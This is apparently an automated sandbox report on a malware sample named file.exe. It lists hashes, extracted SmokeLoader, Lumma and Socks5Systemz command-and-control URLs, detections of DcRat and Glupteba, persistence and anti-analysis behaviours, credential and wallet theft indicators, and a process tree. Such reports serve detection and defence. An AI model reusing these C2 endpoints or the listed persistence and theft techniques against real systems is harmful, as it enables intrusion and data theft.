Resubmissions
22-08-2024 15:33 240822-sy6bqsvbng 7
10-03-2024 16:21 240310-ttpc4aga89 10
10-03-2024 12:34 240310-prvpwacf93 10
Analysis
-
max time kernel
453s -
max time network
681s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20240226-en locale:en-us os:windows10-2004-x64 system -
submitted
10-03-2024 16:21
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20240226-en
General
-
Target
file.exe
-
Size
2.4MB
-
MD5
b11c3fad2e48022f58635df7368d6441
-
SHA1
63883fee892ac1e0d44f568913931c0d59b343d1
-
SHA256
2a362d6d3bceaf1159bc245499a778f1ab9c229c3cbd4be4c63a582a716a4c80
-
SHA512
6c68523b259c307e1c4ff4c6809fb20e5d9d9998a32d03ca06eaf29ec8f27bcaca2cafd9b57420b307160b3ebfeac16d234b99f6119f8f3038f4b5bf4b169023
-
SSDEEP
49152:jCqqfqaaK++EFUw2PsQMIZnLzn8FGaqxMBeVBBzKl:jONGXqGY1y
Malware Config
Extracted
smokeloader
pub1
Extracted
smokeloader
2022
http://trad-einmyus.com/index.php
http://tradein-myus.com/index.php
http://trade-inmyus.com/index.php
Extracted
lumma
https://wisemassiveharmonious.shop/api
https://colorfulequalugliess.shop/api
https://relevantvoicelesskw.shop/api
https://associationokeo.shop/api
https://resergvearyinitiani.shop/api
Extracted
socks5systemz
http://aiueiup.ru/search/?q=67e28dd83a5da32a155afd1b7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978a271ea771795af8e05c644db22f31dfe339426fa11af66c152adb719a9577e55b8603e983a608fff11c8e7949f3d
http://aibukfn.ru/search/?q=67e28dd83a5da32a155afd1b7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978a271ea771795af8e05c644db22f31dfe339426fa11af66c152adb719a9577e55b8603e983a608fff11c8e7949f3d
Signatures
-
DcRat 14 IoCs
DarkCrystal (DC) is a .NET RAT active since June 2019 that is capable of loading additional plugins.
description ioc Process
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation taskmgr.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rNkuvk8Zg4i325fSyIYGB9Wt.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KF9ZwM1htMp18z3Hvz5q82yB.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fG6Eq6XzP5233KSsUEpsaRC8.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\auGVM38sZMaymz2pA3UtXgzI.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sjbOP8xnNE7tcTgPiGZ6wwas.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ksGwX541NFYLLQyfzzA31AQ8.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KJ7YeE2j2u6MjBVRbzctBXge.bat regsvcs.exe
pid Process
652 schtasks.exe
4508 schtasks.exe
2420 schtasks.exe
3148 schtasks.exe
1892 schtasks.exe
336 schtasks.exe
-
Glupteba payload 3 IoCs
resource yara_rule
behavioral2/memory/5132-157-0x0000000002E10000-0x00000000036FB000-memory.dmp family_glupteba
behavioral2/memory/5132-160-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba
behavioral2/memory/5132-247-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process
File created C:\Windows\system32\drivers\etc\hosts eNjkg8FaEHV29ts9FvoPTUAW.exe
File created C:\Windows\system32\drivers\etc\hosts updater.exe
File created C:\Windows\system32\drivers\etc\hosts SvBLsShwKaL8PBWdxkM39f0T.exe
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process
1108 netsh.exe
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation DD14.exe
-
Drops startup file 14 IoCs
description ioc Process
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KJ7YeE2j2u6MjBVRbzctBXge.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GdoQsQKJMNaKGyIxLiOgybfw.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\auGVM38sZMaymz2pA3UtXgzI.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rNkuvk8Zg4i325fSyIYGB9Wt.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ksGwX541NFYLLQyfzzA31AQ8.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fG6Eq6XzP5233KSsUEpsaRC8.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f1ODWN4z7ta2SjcSOf0vGFq5.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1u4JgkTky8yZgPPekFi7TGF4.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vUoKruUEtYqpKN3g8HfnfUiJ.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dk8dESr3kL9No4zXo1hFURzq.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sjbOP8xnNE7tcTgPiGZ6wwas.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eEStE6qx5rsB5duSlZN80DNR.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KF9ZwM1htMp18z3Hvz5q82yB.bat regsvcs.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFyXFu8vFw28FFkvTMLOmWRL.bat regsvcs.exe
-
Executes dropped EXE 48 IoCs
pid Process
6140 jVcQfTbmL2u1ousPu7tmRClP.exe
5168 vn0dZ1KknFaoEqIsGOGNDVH5.exe
5132 GNL8HPgpc3h1ughp9OmayOAG.exe
392 6VC6yCs5XvpI0RU46xUTlGFH.exe
1052 jVcQfTbmL2u1ousPu7tmRClP.tmp
5388 syncUpd.exe
5480 babyclock.exe
1592 babyclock.exe
4752 BroomSetup.exe
5344 tJ6HSphWPkDhrW4fuBx7FKRM.exe
512 tJ6HSphWPkDhrW4fuBx7FKRM.exe
1752 tJ6HSphWPkDhrW4fuBx7FKRM.exe
912 tJ6HSphWPkDhrW4fuBx7FKRM.exe
3720 tJ6HSphWPkDhrW4fuBx7FKRM.exe
5576 eNjkg8FaEHV29ts9FvoPTUAW.exe
1756 GNL8HPgpc3h1ughp9OmayOAG.exe
536 updater.exe
4332 Assistant_108.0.5067.20_Setup.exe_sfx.exe
5208 assistant_installer.exe
5048 assistant_installer.exe
3404 DD14.exe
5536 csrss.exe
2712 DD14.exe
5992 DD14.exe
3352 8F7.exe
5392 DD14.exe
5488 cwvffbi
5904 injector.exe
5388 windefender.exe
5880 windefender.exe
5476 B159.exe
3852 EE16.exe
2612 zauJwzNDKtlWh0Su7sA66DV7.exe
1588 p1ZjVvAKBV5XkBUaTd0q2FDb.exe
5000 Dg5JITRiu73KmlTOTIZVk9xg.exe
4464 zauJwzNDKtlWh0Su7sA66DV7.tmp
2064 syncUpd.exe
3148 q4oVVOJYlJSTjyE4pBQQcwUd.exe
5488 BroomSetup.exe
3924 7FD3.exe
3052 SvBLsShwKaL8PBWdxkM39f0T.exe
4764 babyclock.exe
2516 babyclock.exe
2108 Z5Pwcmkmjtj7jGqzkWXixJVL.exe
6108 Z5Pwcmkmjtj7jGqzkWXixJVL.exe
3400 Z5Pwcmkmjtj7jGqzkWXixJVL.exe
1996 Dg5JITRiu73KmlTOTIZVk9xg.exe
6064 updater.exe
-
Loads dropped DLL 21 IoCs
pid Process
392 6VC6yCs5XvpI0RU46xUTlGFH.exe
1052 jVcQfTbmL2u1ousPu7tmRClP.tmp
392 6VC6yCs5XvpI0RU46xUTlGFH.exe
5344 tJ6HSphWPkDhrW4fuBx7FKRM.exe
512 tJ6HSphWPkDhrW4fuBx7FKRM.exe
1752 tJ6HSphWPkDhrW4fuBx7FKRM.exe
912 tJ6HSphWPkDhrW4fuBx7FKRM.exe
3720 tJ6HSphWPkDhrW4fuBx7FKRM.exe
5388 syncUpd.exe
5388 syncUpd.exe
5208 assistant_installer.exe
5208 assistant_installer.exe
5048 assistant_installer.exe
5048 assistant_installer.exe
2428 taskmgr.exe
1588 p1ZjVvAKBV5XkBUaTd0q2FDb.exe
4464 zauJwzNDKtlWh0Su7sA66DV7.tmp
1588 p1ZjVvAKBV5XkBUaTd0q2FDb.exe
2108 Z5Pwcmkmjtj7jGqzkWXixJVL.exe
6108 Z5Pwcmkmjtj7jGqzkWXixJVL.exe
3400 Z5Pwcmkmjtj7jGqzkWXixJVL.exe
-
Modifies file permissions 1 TTPs 1 IoCs
pid Process
336 icacls.exe
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule
behavioral2/files/0x000600000001da3c-147.dat upx
behavioral2/files/0x000600000001da3c-146.dat upx
behavioral2/memory/4752-149-0x0000000000400000-0x0000000000930000-memory.dmp upx
behavioral2/files/0x000600000001da8b-196.dat upx
behavioral2/files/0x000600000001da8b-208.dat upx
behavioral2/files/0x000600000001da8b-212.dat upx
behavioral2/memory/4752-217-0x0000000000400000-0x0000000000930000-memory.dmp upx
behavioral2/memory/5344-216-0x0000000000B20000-0x0000000001058000-memory.dmp upx
behavioral2/files/0x000600000001da8b-229.dat upx
behavioral2/memory/512-231-0x0000000000B20000-0x0000000001058000-memory.dmp upx
behavioral2/files/0x0007000000020234-244.dat upx
behavioral2/memory/1752-255-0x0000000000A20000-0x0000000000F58000-memory.dmp upx
behavioral2/memory/1752-263-0x0000000000A20000-0x0000000000F58000-memory.dmp upx
behavioral2/files/0x000600000001da8b-264.dat upx
behavioral2/files/0x000600000001da8b-281.dat upx
behavioral2/memory/912-284-0x0000000000B20000-0x0000000001058000-memory.dmp upx
behavioral2/memory/3720-288-0x0000000000B20000-0x0000000001058000-memory.dmp upx
behavioral2/memory/4752-319-0x0000000000400000-0x0000000000930000-memory.dmp upx
behavioral2/memory/5344-320-0x0000000000B20000-0x0000000001058000-memory.dmp upx
behavioral2/memory/4752-377-0x0000000000400000-0x0000000000930000-memory.dmp upx
behavioral2/files/0x000b0000000233bc-1372.dat upx
-
Unexpected DNS network traffic destination 2 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc
Destination IP 91.211.247.248
Destination IP 91.211.247.248
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" GNL8HPgpc3h1ughp9OmayOAG.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\0e5d7f2d-6754-4be0-b473-73a35806b01c\\DD14.exe\" --AutoStart" DD14.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 6 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process
File opened (read-only) \??\D: tJ6HSphWPkDhrW4fuBx7FKRM.exe
File opened (read-only) \??\F: tJ6HSphWPkDhrW4fuBx7FKRM.exe
File opened (read-only) \??\D: tJ6HSphWPkDhrW4fuBx7FKRM.exe
File opened (read-only) \??\F: tJ6HSphWPkDhrW4fuBx7FKRM.exe
File opened (read-only) \??\D: Z5Pwcmkmjtj7jGqzkWXixJVL.exe
File opened (read-only) \??\F: Z5Pwcmkmjtj7jGqzkWXixJVL.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc
74 pastebin.com
75 pastebin.com
190 bitbucket.org
191 bitbucket.org
282 pastebin.com
284 pastebin.com
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc
174 api.2ip.ua
176 api.2ip.ua
343 ip-api.com
-
Manipulates WinMonFS driver 1 IoCs
Rootkits write to WinMonFS to hide directories/files from being detected.
description ioc Process
File opened for modification \??\WinMonFS csrss.exe
-
Drops file in System32 directory 13 IoCs
description ioc Process
File opened for modification C:\Windows\system32\MRT.exe eNjkg8FaEHV29ts9FvoPTUAW.exe
File opened for modification C:\Windows\system32\eventvwr.msc mmc.exe
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe
File opened for modification C:\Windows\system32\MRT.exe updater.exe
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe
File opened for modification C:\Windows\system32\MRT.exe SvBLsShwKaL8PBWdxkM39f0T.exe
-
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target
PID 5652 set thread context of 5724 5652 file.exe 123
PID 536 set thread context of 508 536 updater.exe 222
PID 536 set thread context of 3008 536 updater.exe 227
PID 3404 set thread context of 2712 3404 DD14.exe 241
PID 3352 set thread context of 2348 3352 8F7.exe 249
PID 5992 set thread context of 5392 5992 DD14.exe 250
PID 3852 set thread context of 4764 3852 EE16.exe 280
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process
File opened (read-only) \??\VBoxMiniRdrDN GNL8HPgpc3h1ughp9OmayOAG.exe
-
Drops file in Windows directory 4 IoCs
description ioc Process
File created C:\Windows\rss\csrss.exe GNL8HPgpc3h1ughp9OmayOAG.exe
File created C:\Windows\windefender.exe csrss.exe
File opened for modification C:\Windows\windefender.exe csrss.exe
File opened for modification C:\Windows\rss GNL8HPgpc3h1ughp9OmayOAG.exe
-
Launches sc.exe 27 IoCs
Sc.exe is a Windows utility to control services on the system.
pid Process
5492 sc.exe
5600 sc.exe
5860 sc.exe
3112 sc.exe
6124 sc.exe
3268 sc.exe
6124 sc.exe
1604 sc.exe
1864 sc.exe
2336 sc.exe
5648 sc.exe
4736 sc.exe
3944 sc.exe
2072 sc.exe
4032 sc.exe
3832 sc.exe
5076 sc.exe
1220 sc.exe
5400 sc.exe
2364 sc.exe
2596 sc.exe
5788 sc.exe
2064 sc.exe
2248 sc.exe
456 sc.exe
4120 sc.exe
4084 sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target
5220 5388 WerFault.exe 133
536 5392 WerFault.exe 250
5232 2064 WerFault.exe 285
-
NSIS installer 3 IoCs
resource yara_rule
behavioral2/files/0x00050000000168bb-77.dat nsis_installer_2
behavioral2/files/0x00050000000168bb-82.dat nsis_installer_2
behavioral2/files/0x00050000000168bb-81.dat nsis_installer_2
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cwvffbi
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vn0dZ1KknFaoEqIsGOGNDVH5.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vn0dZ1KknFaoEqIsGOGNDVH5.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cwvffbi
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cwvffbi
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI q4oVVOJYlJSTjyE4pBQQcwUd.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vn0dZ1KknFaoEqIsGOGNDVH5.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI q4oVVOJYlJSTjyE4pBQQcwUd.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI q4oVVOJYlJSTjyE4pBQQcwUd.exe
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 syncUpd.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString syncUpd.exe
-
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process
3148 schtasks.exe
4508 schtasks.exe
1892 schtasks.exe
652 schtasks.exe
2420 schtasks.exe
336 schtasks.exe
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process
3560 tasklist.exe
640 tasklist.exe
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc
HTTP User-Agent header 411 Go-http-client/1.1
-
Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 44 IoCs
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Process not Found Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 Process not Found Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 00000000ffffffff Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 Process not Found Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell Process not Found -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 tJ6HSphWPkDhrW4fuBx7FKRM.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 tJ6HSphWPkDhrW4fuBx7FKRM.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 tJ6HSphWPkDhrW4fuBx7FKRM.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5700 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3300 Process not Found -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2428 taskmgr.exe (the same entry listed 64 times) -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 2428 taskmgr.exe 3300 Process not Found 4688 mmc.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 5168 vn0dZ1KknFaoEqIsGOGNDVH5.exe 5488 cwvffbi 3148 q4oVVOJYlJSTjyE4pBQQcwUd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process
- 2428 taskmgr.exe: SeDebugPrivilege, SeSystemProfilePrivilege, SeCreateGlobalPrivilege
- 5724 regsvcs.exe: SeDebugPrivilege
- 5148 powershell.exe: SeDebugPrivilege
- 1892 powershell.exe: SeDebugPrivilege
- 5396 powershell.exe: SeDebugPrivilege
- 5300 powershell.exe: SeDebugPrivilege
- 5132 GNL8HPgpc3h1ughp9OmayOAG.exe: SeDebugPrivilege, SeImpersonatePrivilege
- 2364 powercfg.exe: SeShutdownPrivilege, SeCreatePagefilePrivilege
- 4564 powercfg.exe: SeShutdownPrivilege, SeCreatePagefilePrivilege
- 2140 powercfg.exe: SeShutdownPrivilege, SeCreatePagefilePrivilege
- 5140 powercfg.exe: SeShutdownPrivilege, SeCreatePagefilePrivilege
- 4688 mmc.exe: SeSecurityPrivilege
- 3300 Process not Found: SeShutdownPrivilege and SeCreatePagefilePrivilege, alternating, for all remaining entries
-
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2428 taskmgr.exe (the same entry listed 64 times) -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2428 taskmgr.exe (the same entry listed 64 times) -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 4752 BroomSetup.exe 4688 mmc.exe 4688 mmc.exe 3300 Process not Found 3300 Process not Found 5488 BroomSetup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target (identical entries collapsed, count in parentheses)
- PID 2904 wrote to memory of 5084 2904 file.exe 97 (3)
- PID 2904 wrote to memory of 1600 2904 file.exe 98 (3)
- PID 5652 wrote to memory of 5724 5652 file.exe 123 (8)
- PID 5652 wrote to memory of 5736 5652 file.exe 124 (3)
- PID 5724 wrote to memory of 6140 5724 regsvcs.exe 127 (3)
- PID 5724 wrote to memory of 5168 5724 regsvcs.exe 129 (3)
- PID 5724 wrote to memory of 5132 5724 regsvcs.exe 128 (3)
- PID 5724 wrote to memory of 392 5724 regsvcs.exe 130 (3)
- PID 6140 wrote to memory of 1052 6140 jVcQfTbmL2u1ousPu7tmRClP.exe 131 (3)
- PID 392 wrote to memory of 5388 392 6VC6yCs5XvpI0RU46xUTlGFH.exe 133 (3)
- PID 1052 wrote to memory of 5480 1052 jVcQfTbmL2u1ousPu7tmRClP.tmp 171 (3)
- PID 1052 wrote to memory of 1592 1052 jVcQfTbmL2u1ousPu7tmRClP.tmp 135 (3)
- PID 392 wrote to memory of 4752 392 6VC6yCs5XvpI0RU46xUTlGFH.exe 136 (3)
- PID 4752 wrote to memory of 1660 4752 BroomSetup.exe 138 (3)
- PID 1660 wrote to memory of 3720 1660 cmd.exe 151 (3)
- PID 1660 wrote to memory of 3148 1660 cmd.exe 141 (3)
- PID 5132 wrote to memory of 5148 5132 GNL8HPgpc3h1ughp9OmayOAG.exe 144 (3)
- PID 5724 wrote to memory of 5344 5724 regsvcs.exe 146 (3)
- PID 5344 wrote to memory of 512 5344 tJ6HSphWPkDhrW4fuBx7FKRM.exe 147 (3)
- PID 5344 wrote to memory of 1752 5344 tJ6HSphWPkDhrW4fuBx7FKRM.exe 182 (2)
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"2⤵PID:5084
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"2⤵PID:1600
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- DcRat
- Loads dropped DLL
- Checks SCSI registry key(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2428
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4120 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:81⤵PID:456
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5300
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5652 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"2⤵
- DcRat
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5724 -
C:\Users\Admin\Pictures\jVcQfTbmL2u1ousPu7tmRClP.exe"C:\Users\Admin\Pictures\jVcQfTbmL2u1ousPu7tmRClP.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:6140 -
C:\Users\Admin\AppData\Local\Temp\is-3Q3V6.tmp\jVcQfTbmL2u1ousPu7tmRClP.tmp"C:\Users\Admin\AppData\Local\Temp\is-3Q3V6.tmp\jVcQfTbmL2u1ousPu7tmRClP.tmp" /SL5="$203F8,1697450,56832,C:\Users\Admin\Pictures\jVcQfTbmL2u1ousPu7tmRClP.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -i5⤵
- Executes dropped EXE
PID:5480
-
-
